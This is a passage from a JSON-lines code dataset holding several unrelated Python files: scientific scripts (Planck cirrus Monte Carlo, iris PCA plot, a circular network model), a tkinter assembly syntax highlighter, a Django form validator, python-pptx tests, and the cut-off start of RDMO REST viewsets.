100*u.micron\nnu = (c.to(u.micron/u.s)/lam).to(u.Hz)\n\n#this is a reference image\n# hdul = fits.open('regist_pluto_20151102_030873_lor_0308731028_0x633_sci.fit')\n#\ncurrentDir = os.path.dirname(os.path.realpath(__file__)) #get current working directory (calling from cmd line python has directory issues)\nos.chdir(currentDir) #change dir to the needed directory\nfileID = open(\"imagefile.txt\",\"r\") #open the file\nimagefile = fileID.readlines()[0] #get the imagefile path\nfileID.close() #close the file\nhdul = fits.open(imagefile) #use the imagefile path\n\n\nref_head = hdul[0].header\ntimestamp = ref_head['SPCUTCJD'][3:]\npixsize = 3600 * np.mean([abs(ref_head['CD1_1'] + ref_head['CD2_1']), abs(ref_head['CD2_1'] + ref_head['CD2_2'])])\n\nmap_err_mean = {'Temperature':np.zeros(N), 'Spectral-Index':np.zeros(N), 'Opacity':np.zeros(N)}\nFLG_noerrPrecalcd = create_map(ref_head, FLG_err, seed, nu=nu.value,FLG_noerrPrecalcd=True) #load in no error I_maps so they do not need to be recalculated\nseed_array = seed + np.arange(0,100,1) #precalculate\n#--- non-parallel method ---\n# for i in range(0,N):\n# print('On MC simulation: '+str(i))\n# PSW_I_map = create_map(ref_head, FLG_err, seed_array[i], nu=nu.value,FLG_noerrPrecalcd=FLG_noerrPrecalcd)\n# keyz = list(PSW_I_map.keys()) #the order of the keys is not guaranteed to be consistent, so can't rely on the order\n# for j in range(0,len(keyz)):\n# map_err_mean[keyz[j]][i] = np.mean(PSW_I_map[keyz[j]])\n# #seed += 1\n# map_err_mean_out = np.zeros((3,N)) #Tau = 0, Temperature = 1, Beta = 2 | Opacity = 0, Temperature = 1, Spectral-Index = 2\n# map_err_mean_out[0,:] = map_err_mean['Opacity']\n# map_err_mean_out[1,:] = map_err_mean['Temperature']\n# map_err_mean_out[2,:] = map_err_mean['Spectral-Index']\n#--- parallel method ---\ndef mc_sim_parallel(ref_head, FLG_err, seed_array_value, nu_value, FLG_noerrPrecalcd, i):\n print('On MC simulation: '+str(i))\n map_err_mean = {'Temperature':0., 'Spectral-Index':0., 'Opacity':0.}\n PSW_I_map = create_map(ref_head, FLG_err, seed_array_value, nu=nu_value,FLG_noerrPrecalcd=FLG_noerrPrecalcd)\n keyz = list(PSW_I_map.keys()) #the order of the keys is not guaranteed to be consistent, so can't rely on the order\n for j in range(0,len(keyz)):\n map_err_mean[keyz[j]] = np.mean(PSW_I_map[keyz[j]])\n #seed += 1\n return map_err_mean\n\nmc_sim_parallel_list = [None for i in range(0,N)] #preallocate list\nfor i in range(0,N): #create input list for parallel stuff\n mc_sim_parallel_list[i] = [ref_head, FLG_err, seed_array[i], nu.value, FLG_noerrPrecalcd, i]\n\nmc_sim_parallel_results = Parallel(n_jobs=cpu_count())(delayed(mc_sim_parallel)(i, j, k, l, m, n) for i, j, k, l, m, n in mc_sim_parallel_list)\n\nmap_err_mean_out = np.zeros((3,N)) #Tau = 0, Temperature = 1, Beta = 2 | Opacity = 0, Temperature = 1, Spectral-Index = 2\nfor i in range(0,N):\n map_err_mean_out[0,i] = mc_sim_parallel_results[i]['Opacity']\n map_err_mean_out[1,i] = mc_sim_parallel_results[i]['Temperature']\n map_err_mean_out[2,i] = mc_sim_parallel_results[i]['Spectral-Index']\n\nio.savemat('planck_' + timestamp + '_errmean.mat',{'err_means': map_err_mean_out})\nprint('done')\n# gridra = ra\n# griddec = dec\n\n# ra = ra[:,0]\n# dec = dec[0, :]\n# mid_ra = np.median(ra)\n# mid_dec = np.median(dec)\n# PSW_header = make_header(pixsize, PSW_I_map.shape, mid_ra, mid_dec)\n\n# hdu1 = fits.PrimaryHDU(PSW_I_map, PSW_header)\n# hdul1 = fits.HDUList([hdu1])\n#hdul1.writeto('planck_' + timestamp + '_fx.fits',overwrite=True)\n\n# hdu2 = fits.PrimaryHDU(gridra, PSW_header)\n# hdul2 = fits.HDUList([hdu2])\n# hdul2.writeto('planck_' + timestamp + '_ra.fits',overwrite=True)\n#\n# hdu3 = fits.PrimaryHDU(griddec, PSW_header)\n# hdul3 = fits.HDUList([hdu3])\n# hdul3.writeto('planck_' + timestamp + '_dc.fits',overwrite=True)\n\n# min_dec = np.min(dec)\n# max_dec = np.max(dec)\n# min_ra = np.min(ra)\n# max_ra = np.max(ra)\n#\n# fig,ax = plt.subplots(figsize=(14,11))\n# plt.imshow(PSW_I_map, origin='lower', extent=[min_dec, max_dec, min_ra, max_ra])#, clim=(1.8916812, 8.812404))\n# cbar = plt.colorbar()\n# plt.xlabel('Dec')\n# plt.ylabel('RA')\n# cbar.set_label(r'$I_{\\nu}$ [MJy/sr]')\n# plt.show()\n","sub_path":"py/Planck_Cirrus_Estimation-master/get_planck_mc.py","file_name":"get_planck_mc.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"234126629","text":"from tkinter import *\nimport string\nfrom Format.Generic import FormatGeneric\n\n\nclass FormatAssembly(FormatGeneric):\n \"\"\"This class takes care of all the formatting for assembly.\"\"\"\n\n def __init__(self, **kwargs):\n\n # Don't forget to call the base's __init__ first!\n super().__init__(**kwargs)\n\n # A tuple of 8086/8088, 80186/80188, 80286, 80386, 80486,\n # Pentium, Pentium MMX, and AMD K6 instructions.\n # NOTE: iretd, retf and retn?\n self.instructions = (\"aaa\", \"aad\", \"aam\", \"aas\", \"adc\", \"adc\", \"add\",\n \"and\", \"call\", \"cbw\", \"clc\", \"cld\", \"cli\", \"cmc\",\n \"cmp\", \"cmpsb\", \"cmpsw\", \"cwd\", \"daa\", \"das\",\n \"dec\", \"div\", \"esc\", \"hlt\", \"idiv\", \"imul\", \"in\",\n \"inc\", \"int\", \"into\", \"iret\", \"ja\", \"jae\", \"jb\",\n \"jbe\", \"jc\", \"je\", \"jg\", \"jge\", \"jl\", \"jle\",\n \"jna\", \"jnae\", \"jnb\", \"jnbe\", \"jnc\", \"jng\",\n \"jnge\", \"jnl\", \"jno\", \"jnp\", \"jns\", \"jnz\", \"jo\",\n \"jp\", \"jpe\", \"js\", \"jz\", \"jcxz\", \"jmp\", \"lahf\",\n \"lds\", \"lea\", \"lock\", \"lodsb\", \"lodsw\", \"loop\",\n \"loope\", \"loopne\", \"loopnz\", \"loopz\", \"mov\",\n \"movsb\", \"movsw\", \"mul\", \"neg\", \"nop\", \"not\",\n \"or\", \"out\", \"pop\", \"popf\", \"push\", \"pushf\",\n \"rcl\", \"rcr\", \"rep\", \"repe\", \"repnz\", \"repz\",\n \"ret\", \"retn\", \"retf\", \"rol\", \"ror\", \"sahf\",\n \"sal\", \"sar\", \"sbb\", \"scasb\", \"scasw\", \"shl\",\n \"shr\", \"stc\", \"std\", \"sti\", \"stosb\", \"stosw\",\n \"sub\", \"test\", \"wait\", \"xchg\", \"xlat\", \"xor\",\n \"bound\", \"enter\", \"ins\", \"leave\", \"outs\", \"popa\",\n \"pusha\", \"arpl\", \"clts\", \"lar\", \"lgdt\", \"lidt\",\n \"lldt\", \"lmsw\", \"loadall\", \"lsl\", \"ltr\", \"sgdt\",\n \"sidt\", \"sldt\", \"smsw\", \"str\", \"verr\", \"verw\",\n \"bsf\", \"bsr\", \"bt\", \"btc\", \"btr\", \"bts\", \"cdq\",\n \"cmpsd\", \"cwde\", \"insd\", \"iretd\", \"iretf\",\n \"jecxz\", \"lfs\", \"lgs\", \"lss\", \"lodsd\", \"loopw\",\n \"loopzw\", \"loopew\", \"loopnzw\", \"loopnew\", \"loopd\",\n \"loopzd\", \"looped\", \"loopnzd\", \"looped\", \"movsd\",\n \"movsx\", \"movzx\", \"outsd\", \"popad\", \"popfd\",\n \"pushad\", \"pushfd\", \"scasd\", \"seta\", \"setae\",\n \"setb\", \"setbe\", \"setc\", \"sete\", \"setg\", \"setge\",\n \"setl\", \"setle\", \"setna\", \"setnae\", \"setnb\",\n \"setnbe\", \"setnc\", \"setne\", \"setng\", \"setnge\",\n \"setnl\", \"setnle\", \"setno\", \"setnp\", \"setns\",\n \"setnz\", \"seto\", \"setp\", \"setpe\", \"setpo\", \"sets\",\n \"setz\", \"shld\", \"shrd\", \"stosd\", \"bswap\",\n \"cmpxchg\", \"invd\", \"invlpg\", \"wbinvd\", \"xadd\",\n \"cpuid\", \"cmpxchg8b\", \"rdmsr\", \"rdtsc\", \"wrmsr\",\n \"rsm\", \"rdpmc\", \"syscall\", \"sysret\")\n\n # A tuple of all registers for the x86_16 and some IA-32 (x86_32).\n self.registers = (\"ax\", \"al\", \"ah\", \"bx\", \"bl\", \"bh\", \"cx\", \"cl\", \"ch\",\n \"dx\", \"dl\", \"dh\", \"cs\", \"ds\", \"es\", \"fs\", \"gs\", \"ss\",\n \"si\", \"di\", \"bp\", \"sp\", \"cr0\", \"cr1\", \"cr2\", \"cr3\",\n \"cr4\", \"cr5\", \"cr6\", \"cr7\", \"cr8\", \"cr9\", \"cr10\",\n \"cr11\", \"cr12\", \"cr13\", \"cr14\", \"cr15\", \"eax\", \"ebx\",\n \"ecx\", \"edx\", \"ess\", \"esi\", \"edi\", \"ebp\", \"esp\",\n \"dr0\", \"dr1\", \"dr2\", \"dr3\", \"dr4\", \"dr5\", \"dr6\",\n \"dr7\", \"dr8\", \"dr9\", \"dr10\", \"dr11\", \"dr12\", \"dr13\",\n \"dr14\", \"dr15\")\n\n # Create the regex string.\n self.regw = \"%s|%s|%s\" % (\"|\".join(self.instructions),\n \"|\".join(self.registers),\n \"|\".join((\"[0-9]+\", \"['|\\\"]\", \";\",\n \"0[xX][0-9a-fA-F]+\")))\n\n\n def color(self):\n # Get the text box.\n text = self.text\n\n # Remove all tags.\n for i in (\"instruction\", \"register\", \"number\", \"comment\", \"string\"):\n text.tag_remove(i, \"OLD_INSERT linestart\", INSERT + \" lineend\")\n\n # Find all of the registers, instructions, numbers, strings, and comments.\n # Reduces alot of memory footprint. Yay!!!!\n index = \"OLD_INSERT linestart\"\n\n while True:\n index = text.search(self.regw, index, INSERT + \" lineend\", regexp=True, nocase=1)\n if not index:\n break\n\n # Setup these temp variables.\n start = index + \" wordstart\"\n end = index + \" wordend\"\n\n if text.get(start) in (\"'\", \"\\\"\"):\n index2 = text.search(text.get(index), index+\"+1c\", INSERT + \" lineend\", regexp=False, nocase=1)\n if index2 == \"\":\n end = index + \" lineend\"\n else:\n end = index2 + \"+1c\"\n text.tag_add(\"string\", index, end)\n elif text.get(index) == \";\":\n end = index + \" lineend\"\n text.tag_add(\"comment\", index, end)\n if text.get(start, end) in self.instructions:\n text.tag_add(\"instruction\", index, end)\n elif text.get(start, end) in self.registers:\n text.tag_add(\"register\", index, end)\n elif text.get(start) in string.hexdigits:\n text.tag_add(\"number\", index, end)\n index = end\n\n # Set the modified flag to zero.\n text.edit_modified(0)\n\n # Setup the new index\n if text.index(\"OLD_INSERT\") != text.index(INSERT):\n text.mark_set(\"OLD_INSERT\", INSERT)\n\n","sub_path":"Format/Assembly.py","file_name":"Assembly.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"371309943","text":"# coding: utf-8\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn.decomposition import PCA\r\n\r\n# 解决中文显示问题\r\nplt.rcParams['font.sans-serif'] = ['KaiTi'] # 指定默认字体\r\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\r\n\r\niris = datasets.load_iris()\r\nspecies = iris.target\r\nx_reduced = PCA(n_components=3).fit_transform(iris.data)\r\n\r\n# SCATTERPLOT 3D\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nax.set_title('Iris Dataset by PCA', size=14)\r\nax.scatter(x_reduced[:, 0], x_reduced[:, 1], x_reduced[:, 2], c=species)\r\nax.set_xlabel('First eigenvector')\r\nax.set_ylabel('Second eigenvector')\r\nax.set_zlabel('Third eigenvector')\r\nax.w_xaxis.set_ticklabels(())\r\nax.w_yaxis.set_ticklabels(())\r\nax.w_zaxis.set_ticklabels(())\r\nplt.show()\r\n","sub_path":"iris_PCA_3D.py","file_name":"iris_PCA_3D.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"115733906","text":"from ringity.distribution_functions import mean_similarity, cdf_similarity, get_rate_parameter\nfrom scipy.spatial.distance import pdist, squareform\nfrom numpy import pi as PI\n\nimport scipy\nimport numpy as np\nimport networkx as nx\n\n# =============================================================================\n# ------------------------------- PREPARATION -----------------------------\n# =============================================================================\n\n# TODO: collect parameters in a dictionary, e.g. network_parms\n\ndef get_positions(N, beta):\n if beta == 0:\n return np.zeros(N)\n elif beta == 1:\n return np.random.uniform(0,2*PI, size=N)\n else:\n return np.random.exponential(scale=1/np.tan(PI*(1-beta)/2), size=N) % (2*PI)\n\n\ndef circular_distances(thetas):\n abs_dists = pdist(thetas.reshape(-1,1))\n return np.where(abs_dists0 there is a second overlap\n else:\n x2 = (dist-2*PI*(1-a)).clip(0)\n return x1 + x2\n\ndef slope(rho, rate, a):\n mu_S = mean_similarity(rate,a)\n if rho <= mu_S:\n return rho/mu_S\n else:\n const = 1/np.sinh(PI*rate)\n def integral(k):\n term1 = np.sinh((1 + 2*a*(1/k-1))*PI*rate)\n term2 = (k*np.sinh((a*PI*rate)/k)*np.sinh(((a+k-2*a*k)*PI*rate)/k))/(a*PI*rate)\n return term1-term2\n return scipy.optimize.newton(\n func = lambda k: const*integral(k) + (1-cdf_similarity(1/k, rate, a)) - rho,\n x0 = rho/mu_S)\n\ndef get_a_min(rho, beta):\n if beta == 0:\n return 0.\n elif beta == 1:\n return rho/2\n else:\n rate = np.tan(PI*(1-beta)/2)\n x = np.sinh(PI*rate)*(1-rho)\n return 1/2-np.log(np.sqrt(x**2+1)+x)/(2*PI*rate)\n\n\n# =============================================================================\n# ------------------------------ NETWORK MODEL ----------------------------\n# =============================================================================\ndef get_delays(N, param, parameter_type = 'delay'):\n if parameter_type == 'delay':\n return get_positions(N, param)\n else:\n assert False, \"Not implemented yet!\"\n\ndef delays_to_distances(dels):\n return circular_distances(dels)\n\ndef positions_to_distances(positions):\n return circular_distances(positions)\n\ndef distances_to_similarities(dists, a):\n return overlap(dists, a)/(2*PI*a)\n\ndef similarities_to_probabilities(simis, param, a, rho, parameter_type='rate'):\n rate = get_rate_parameter(param, parameter_type=parameter_type)\n rho_max = 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate)\n\n if np.isclose(rho,rho_max):\n # if rho is close to rho_max, all the similarities are 1.\n probs = np.sign(simis)\n elif rho < rho_max:\n k = slope(rho, rate, a)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= rho_max, \"Please increase `a` or decrease `rho`!\"\n\n return probs\n\ndef weighted_network_model(N, rho, beta, a=None, return_positions=False):\n \"\"\"\n Returns samples of the Network model as described in [1]\n The outputs are samples of the\n - positions of the nodes placed on the circle according to a\n (wrapped) exponential distribution,\n - their pairwise distances\n - their similarities, given an 'activity window' of size a\n - their connection probabilities, given the expected density rho.\n \"\"\"\n\n # just making sure no one tries to be funny...\n assert 0 <= beta <= 1\n assert 0 <= rho <= 1\n\n a_min = get_a_min(rho, beta)\n\n if a is None:\n a = a_min\n\n assert 0 <= a <= 1\n\n if beta == 0 or a == 1:\n posis = np.zeros(N)\n simis = np.ones(int(N*(N-1)/2))\n k = rho\n probs = (simis*k).clip(0,1)\n elif beta == 1:\n posis = np.random.uniform(0,2*PI, size=N)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n if np.isclose(a,a_min):\n probs = np.sign(simis)\n elif rho <= a:\n k = rho/a\n probs = (simis*k).clip(0,1)\n elif rho < 2*a:\n k = a/(2*a-rho)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= 2*a, \"Please increase `a` or decrease `rho`!\"\n else:\n rate = np.tan(PI*(1-beta)/2)\n posis = np.random.exponential(scale=1/rate, size=N) % (2*PI)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n rho_max = 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate)\n if np.isclose(rho,rho_max):\n probs = np.sign(simis)\n elif rho < 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate):\n k = slope(rho, rate, a)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= rho_max, \"Please increase `a` or decrease `rho`!\"\n\n if return_positions:\n return posis, probs\n else:\n return probs\n\n\ndef weighted_network_model2(N, rho, beta,\n a = None,\n posis = None,\n return_positions = False):\n \"\"\"\n Returns samples of the Network model as described in [1]\n The outputs are samples of the\n - positions of the nodes placed on the circle according to a\n (wrapped) exponential distribution,\n - their pairwise distances\n - their similarities, given an 'activity window' of size a\n - their connection probabilities, given the expected density rho.\n \"\"\"\n\n # STEP 0: calculate slope\n # STEP 1: Get posis\n # STEP 2: transform posis to distances\n # STEP 3: transform distances to similarities\n # STEP 4: transform similarities to probablities\n\n # just making sure no one tries to be funny...\n assert 0 <= beta <= 1\n assert 0 <= rho <= 1\n\n a_min = get_a_min(rho, beta)\n\n if a is None:\n a = a_min\n\n assert 0 <= a <= 1\n\n if beta == 0 or a == 1:\n posis = np.zeros(N)\n simis = np.ones(int(N*(N-1)/2))\n k = rho\n probs = (simis*k).clip(0,1)\n elif beta == 1:\n posis = np.random.uniform(0,2*PI, size=N)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n if np.isclose(a,a_min):\n probs = np.sign(simis)\n elif rho <= a:\n k = rho/a\n probs = (simis*k).clip(0,1)\n elif rho < 2*a:\n k = a/(2*a-rho)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= 2*a, \"Please increase `a` or decrease `rho`!\"\n else:\n rate = np.tan(PI*(1-beta)/2)\n posis = np.random.exponential(scale=1/rate, size=N) % (2*PI)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n rho_max = 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate)\n if np.isclose(rho,rho_max):\n probs = np.sign(simis)\n elif rho < 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate):\n k = slope(rho, rate, a)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= rho_max, \"Please increase `a` or decrease `rho`!\"\n\n if return_positions:\n return posis, probs\n else:\n return probs\n\n\ndef network_model(N, rho, beta, a=0.5, return_positions=False):\n \"\"\"\n Network model as described in [1]. The output is the (empirical) positions\n of the nodes placed on the circle according to a von Mises distribution,\n followed by a tripple consisting of the (empirical) distribution of the\n pairwise distances, similarities and connection probabilities respectively.\n \"\"\"\n if return_positions:\n posis, probs = weighted_network_model(N = N,\n rho = rho,\n beta = beta,\n a = a,\n return_positions = True)\n else:\n probs = weighted_network_model(N = N,\n rho = rho,\n beta = beta,\n a = a,\n return_positions = False)\n\n rands = np.random.uniform(size=int(N*(N-1)/2))\n A = squareform(np.where(probs>rands, 1, 0))\n G = nx.from_numpy_array(A)\n\n if return_positions:\n return posis, G\n else:\n return G\n\n\n# =============================================================================\n# --------------------------- OOP Here I come!! ------------------------------\n# =============================================================================\nclass NetworkBuilder:\n pass\n\nclass GeneralNetworkBuilder:\n def __init__(self, N, rho, beta, a = None):\n self.N = N\n self.rho = rho\n self.beta = beta\n self.rate = np.tan(PI*(1-beta)/2)\n\n self.a_min = get_a_min(rho, beta)\n self.rho_max = 1-np.sinh((PI-2*self.a*PI)*self.rate)/np.sinh(PI*self.rate)\n\n if a is None:\n self.a = self.a_min\n else:\n self.a = a\n\n assert 0 <= self.beta <= 1\n assert 0 <= self.rho <= 1\n\n assert self.a_min <= self.a <= 1\n\n def get_slope(self):\n mu_S = mean_similarity(self.rate, self.a)\n if self.rho <= mu_S:\n return self.rho/mu_S\n else:\n const = 1/np.sinh(PI*self.rate)\n def integral(k):\n term1 = np.sinh((1 + 2*self.a * (1/k-1))*PI*self.rate)\n term2 = (k*np.sinh((self.a * PI * self.rate)/k) *\n np.sinh(((self.a + k - 2*k*self.a) * PI * self.rate)/k)) / \\\n (self.a * PI * self.rate)\n return term1-term2\n self.slope = scipy.optimize.newton(\n func = lambda k: const*integral(k) +\n (1-cdf_similarity(1/k, self.rate, self.a)) -\n self.rho,\n x0 = self.rho/mu_S)\n\n def get_positions(self):\n self.positions = np.random.exponential(scale = 1/np.tan(PI*(1-self.beta)/2),\n size = self.N) % (2*PI)\n def get_distances(self):\n self.distances = positions_to_distances(self.positions)\n\n def get_similarities(self):\n self.similarities = distances_to_similarities(self.distances, self.a)\n\n def get_probabilities(self):\n self.probabilities = (self.similarities * self.slope).clip(0,1)\n\n def generate_model(self, save_memory = False):\n self.get_slope()\n self.get_positions()\n\n self.get_distances()\n self.get_similarities()\n\n if save_memory:\n del self.distances\n\n self.get_probabilities()\n\n if save_memory:\n del self.similarities\n\n def get_network(self):\n coin_flip = np.random.uniform(size=int(N*(N-1)/2))\n A = squareform(np.where(self.probablities > coin_flip, 1, 0))\n return nx.from_numpy_array(A)\n\nclass ERNetworkBuilder:\n def __init__(self, N, rho):\n self.N = N\n self.rho = rho\n\n def generate_model(self):\n pass\n\n def get_network(self):\n return nx.erdos_renyi_graph(n = self.N, p = self.rho)\n\n\nclass WSNetworkBuilder:\n def __init__(self, N, rho, a = None):\n self.N = N\n self.rho = rho\n self.beta = 1\n self.a_min = rho/2\n self.rho_max = 1 # Maybe....\n\n if a is None:\n self.a = self.a_min\n else:\n self.a = a\n\n assert 0 <= self.beta <= 1\n assert 0 <= self.rho <= 1\n\n assert self.a_min <= self.a <= 1\n\n def get_slope(self):\n if np.isclose(self.a, self.a_min):\n self.slope = None\n elif self.rho <= self.a:\n self.slope = self.rho/self.a\n elif self.rho < 2*self.a:\n self.slope = self.a/(2*self.a - self.rho)\n else:\n assert self.rho <= 2*self.a, \"Please increase `a` or decrease `rho`!\"\n\n def get_positions(self):\n self.positions = np.random.exponential(scale = 1/np.tan(PI*(1-self.beta)/2),\n size = self.N) % (2*PI)\n def get_distances(self):\n self.distances = positions_to_distances(self.positions)\n\n def get_similarities(self):\n self.similarities = distances_to_similarities(self.distances, self.a)\n\n def get_probabilities(self):\n if np.isclose(self.a, self.a_min):\n self.probabilities = np.sign(self.similarities)\n elif self.rho <= self.a:\n self.probabilities = (self.similarities).clip(0,1)\n elif self.rho < 2*self.a:\n self.probabilities = (self.similarities*self.slope).clip(0,1)\n else:\n assert False, \"Something went wrong...\"\n\n def generate_model(self, save_memory = False):\n self.get_slope()\n self.get_positions()\n\n self.get_distances()\n self.get_similarities()\n\n if save_memory:\n del self.distances\n\n self.get_probabilities()\n\n if save_memory:\n del self.similarities\n\n def get_network(self):\n coin_flip = np.random.uniform(size=int(N*(N-1)/2))\n A = squareform(np.where(self.probablities > coin_flip, 1, 0))\n return nx.from_numpy_array(A)\n\n\n# =============================================================================\n# ------------------------------ REFERENCES ---------------------------------\n# =============================================================================\n\n# [1] Not published yet.\n","sub_path":"ringity/_legacy/legacy_network_model.py","file_name":"legacy_network_model.py","file_ext":"py","file_size_in_byte":13801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"13520323","text":"from maintain_frontend.services.validation.field_validator import FieldValidator\nfrom maintain_frontend.services.validation.validation_error_builder import ValidationErrorBuilder\n\n\nclass LandCompensationLandSoldValidator(object):\n\n @staticmethod\n def validate(land_sold_description, land_works_particulars):\n \"\"\"Specifies which validation methods should be called for each input field.\n\n\n parameters:\n - land_sold_description: The description of a charge.\n - land_works_particulars: The description of the work planned.\n returns:\n dict: An instance of ValidationErrorBuilder with a ValidationError dict and a heading summary message.\n \"\"\"\n\n validation_error_builder = ValidationErrorBuilder()\n\n FieldValidator(land_sold_description, 'land-sold-description', 'Description of the charge',\n validation_error_builder,\n inline_message='This is the land bought by the authority, '\n 'so they can do public works on the land.',\n summary_message=\"Describe the land sold\") \\\n .is_required()\n\n FieldValidator(land_sold_description, 'land-sold-description', 'Description of the charge',\n validation_error_builder,\n inline_message=\"Answer must be shorter than 400 characters (about 60 words)\",\n summary_message=\"Answer too long\") \\\n .is_length_less_than_or_equal_to(400)\n\n FieldValidator(land_works_particulars, 'land-works-particulars', 'The description of the work planned',\n validation_error_builder,\n inline_message=\"This is the work that the authority wants to do on the land they have bought.\",\n summary_message=\"Describe the work\") \\\n .is_required()\n\n FieldValidator(land_works_particulars, 'land-works-particulars', 'The description of the work planned',\n validation_error_builder,\n inline_message=\"Answer must be shorter than 400 characters (about 60 words)\",\n summary_message=\"Answer too long\") \\\n .is_length_less_than_or_equal_to(400)\n\n return validation_error_builder.get()\n","sub_path":"maintain_frontend/add_land_charge/validation/land_compensation_land_sold_validator.py","file_name":"land_compensation_land_sold_validator.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"299603305","text":"# encoding: utf-8\n\n\"\"\"Test suite for pptx.presentation module.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport pytest\n\nfrom pptx.opc.packuri import PackURI\nfrom pptx.oxml.presentation import CT_Presentation, CT_SlideIdList\nfrom pptx.parts.coreprops import CoreProperties\nfrom pptx.parts.part import PartCollection\nfrom pptx.parts.slides import SlideCollection\nfrom pptx.presentation import Package, Presentation\n\nfrom .unitutil import absjoin, class_mock, instance_mock, test_file_dir\n\n\nimages_pptx_path = absjoin(test_file_dir, 'with_images.pptx')\ntest_pptx_path = absjoin(test_file_dir, 'test.pptx')\n\n\nclass DescribePackage(object):\n\n def it_loads_default_template_when_opened_with_no_path(self):\n prs = Package.open().presentation\n assert prs is not None\n slidemasters = prs.slidemasters\n assert slidemasters is not None\n assert len(slidemasters) == 1\n slidelayouts = slidemasters[0].slidelayouts\n assert slidelayouts is not None\n assert len(slidelayouts) == 11\n\n def it_gathers_package_image_parts_on_open(self):\n pkg = Package.open(images_pptx_path)\n assert len(pkg._images) == 7\n\n def it_provides_ref_to_package_presentation_part(self):\n pkg = Package.open()\n assert isinstance(pkg.presentation, Presentation)\n\n def it_provides_ref_to_package_core_properties_part(self):\n pkg = Package.open()\n assert isinstance(pkg.core_properties, CoreProperties)\n\n def it_can_save_itself_to_a_pptx_file(self, temp_pptx_path):\n \"\"\"Package.save produces a .pptx with plausible contents\"\"\"\n # setup ------------------------\n pkg = Package.open()\n # exercise ---------------------\n pkg.save(temp_pptx_path)\n # verify -----------------------\n pkg = Package.open(temp_pptx_path)\n prs = pkg.presentation\n assert prs is not None\n slidemasters = prs.slidemasters\n assert slidemasters is not None\n assert len(slidemasters) == 1\n slidelayouts = slidemasters[0].slidelayouts\n assert slidelayouts is not None\n assert len(slidelayouts) == 11\n\n # fixtures ---------------------------------------------\n\n @pytest.fixture\n def temp_pptx_path(self, tmpdir):\n return absjoin(str(tmpdir), 'test-pptx.pptx')\n\n\nclass DescribePresentation(object):\n\n def it_provides_access_to_the_slide_masters(self, prs):\n assert isinstance(prs.slidemasters, PartCollection)\n\n def it_creates_slide_collection_on_first_reference(\n self, prs, SlideCollection_, sldIdLst_, slides_):\n slides = prs.slides\n # verify -----------------------\n prs._element.get_or_add_sldIdLst.assert_called_once_with()\n SlideCollection_.assert_called_once_with(sldIdLst_, prs)\n slides.rename_slides.assert_called_once_with()\n assert slides == slides_\n\n def it_reuses_slide_collection_instance_on_later_references(self, prs):\n slides_1 = prs.slides\n slides_2 = prs.slides\n assert slides_2 is slides_1\n\n # fixtures ---------------------------------------------\n\n @pytest.fixture\n def ct_presentation_(self, request, sldIdLst_):\n ct_presentation_ = instance_mock(request, CT_Presentation)\n ct_presentation_.get_or_add_sldIdLst.return_value = sldIdLst_\n return ct_presentation_\n\n @pytest.fixture\n def prs(self, ct_presentation_):\n partname = PackURI('/ppt/presentation.xml')\n prs = Presentation(partname, None, ct_presentation_, None)\n return prs\n\n @pytest.fixture\n def sldIdLst_(self, request):\n return instance_mock(request, CT_SlideIdList)\n\n @pytest.fixture\n def SlideCollection_(self, request, slides_):\n SlideCollection_ = class_mock(\n request, 'pptx.presentation.SlideCollection'\n )\n SlideCollection_.return_value = slides_\n return SlideCollection_\n\n @pytest.fixture\n def slides_(self, request):\n return instance_mock(request, SlideCollection)\n","sub_path":"tests/test_presentation.py","file_name":"test_presentation.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"554149826","text":"from django.conf import settings\nfrom django.contrib.auth.models import Group\nfrom django.contrib.sites.models import Site\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom rdmo.core.permissions import HasModelPermission\n\nfrom .serializers import GroupSerializer, SiteSerializer\n\n\nclass SettingsViewSet(viewsets.GenericViewSet):\n\n permission_classes = (IsAuthenticated, )\n\n def list(self, request, *args, **kwargs):\n return Response({\n key.lower(): getattr(settings, key) for key in settings.SETTINGS_API\n })\n\n\nclass SitesViewSet(viewsets.ReadOnlyModelViewSet):\n permission_classes = (HasModelPermission, )\n queryset = Site.objects.all()\n serializer_class = SiteSerializer\n\n\nclass GroupViewSet(viewsets.ReadOnlyModelViewSet):\n permission_classes = (HasModelPermission, )\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass CopyModelMixin:\n\n @action(detail=True, methods=['PUT'], permission_classes=[HasModelPermission])\n def copy(self, request, pk=None):\n # get the instance to be copied\n instance = self.get_object()\n\n # get the copy relevant data from the request\n uri_prefix = request.data.get('uri_prefix')\n key = 